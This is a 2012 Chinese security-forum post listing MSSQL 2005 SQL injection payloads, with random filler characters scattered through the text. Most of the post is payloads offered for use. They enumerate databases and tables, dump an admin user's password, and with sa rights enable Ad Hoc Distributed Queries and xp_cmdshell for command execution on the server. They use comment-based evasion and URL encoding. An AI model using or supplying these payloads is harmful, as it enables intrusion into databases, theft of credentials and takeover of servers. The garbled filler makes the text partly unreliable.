找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2184|回复: 0
打印 上一主题 下一主题

MSsql2005注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:19:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

7 j8 H/ M6 n! _( d. _# x2 `2 N( `  I  \' B. X! A7 i
. Y, I% ^& X% W
[Copy to clipboard]CODE:8 R) y7 j; u/ x8 G" Q
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
/ V3 N! b% a9 h0 x2 I' ^
) V4 T( W" I& }. ?爆表语句,somedb部份是所要列的数据库,红色数字1累加
5 \# _$ k/ x! ?$ V+ x3 v2 _1 u; x! j% r, m

; y5 T. j1 Y1 A* q3 E$ Y8 V2 B[Copy to clipboard]CODE:
+ E3 f( ?* W5 z4 m! I6 ?7 ]/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--& U8 T+ B8 M5 ~: q

$ L. k- ^. e: M) ^+ X7 N9 P( p爆字段语句,爆表admin里user='icerover'的密码段7 X- E1 ]0 C0 j* C' ?

6 j7 Q3 g- r7 P4 z( r6 \# U9 k0 `+ ^  W/ @1 l8 T1 C) p" T
[Copy to clipboard]CODE:8 a; U1 L2 f( L$ z" \
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--* A/ K0 B. ?2 n( Q

5 \) I) o0 _, j3 P' k+ c' b# U& Emssql2005默认没有开xp_cmdshell的,openrowset也不能用0 E1 [$ z/ |% D
如果是sa权限,可以这样来开启0 A- {; t# q+ S3 z: z5 F
开启openrowset
/ X- s, H, O% i* d+ x
! E8 u! }7 o0 r3 u+ Q0 N. {9 B9 P# l5 g2 p7 l9 d
[Copy to clipboard]CODE:
8 K2 H: l' d9 v0 |& ^/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--6 c  R5 Z1 f$ u' m" @* ]
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--" y; G: {) w/ J
) I- e' v0 E, ~9 Y! E2 L/ i9 {: f3 U
开启xp_cmdshell
: |& p  [$ d4 ?' h# v; I3 Q/ w4 s/ G1 \' q
6 o. y+ N) |! Q7 h( n
[Copy to clipboard]CODE:+ K! w3 W' `( B6 }) e# T/ c
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
: Q+ S* t0 N- T/ ?6 p8 A0 dEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
  g1 d. O8 y0 g. f
3 M, L# c$ J7 G6 ~ok,over~~晚安
8 j8 S6 b$ y( e; g5 ?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表